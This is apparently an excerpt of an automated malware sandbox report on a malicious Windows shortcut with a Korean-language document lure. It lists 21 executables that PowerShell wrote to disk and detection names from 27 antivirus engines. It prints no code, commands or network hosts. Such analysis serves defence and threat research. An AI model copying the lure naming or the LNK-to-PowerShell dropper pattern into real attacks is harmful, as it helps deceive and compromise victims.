NtResumeThread March 10, 2025, 2:48 p.m.	thread_handle: 0x00000334 suspend_count: 1 process_identifier: 2648	1	0	0

The process powershell.exe wrote an executable file to disk (21 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Windows\System32\expand.exe

File has been identified by 27 AntiVirus engines on VirusTotal as malicious (27 events)

Lionic	Trojan.WinLNK.Powecom.4!c
CTX	lnk.trojan.powecom
Skyhigh	BehavesLike.Dropper.tx
ALYac	Trojan.Agent.LNK.Gen
VIPRE	Trojan.GenericKD.75917531
Arcabit	Trojan.Generic.D48668DB
Symantec	Scr.Mallnk!gen4
ESET-NOD32	LNK/Agent.AHE
TrendMicro-HouseCall	Trojan.LNK.GULOADER.YXFB2Z
Avast	LNK:Agent-HN [Trj]
Kaspersky	HEUR:Trojan.Multi.Powecom.a
BitDefender	Trojan.GenericKD.75917531
MicroWorld-eScan	Trojan.GenericKD.75917531
Rising	Trojan.PSRunner/LNK!1.DB7E (CLASSIC)
Emsisoft	Trojan.GenericKD.75917531 (B)
TrendMicro	Trojan.LNK.GULOADER.YXFB2Z
FireEye	Trojan.GenericKD.75917531
Google	Detected
GData	Trojan.GenericKD.75917531
Varist	LNK/ABTrojan.TXFI-
AhnLab-V3	Dropper/LNK.Generic.S2899
VBA32	Trojan.Link.Crafted
Ikarus	Trojan.LNK.Agent
Tencent	Win32.Trojan.Powecom.Uwhl
Fortinet	LNK/Agent.AHE!tr
AVG	LNK:Agent-HN [Trj]
alibabacloud	Trojan:Win/Powecom.a

가상자산사업자+검사계획민당정회의+발표자료_FN2.hwp.lnk

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All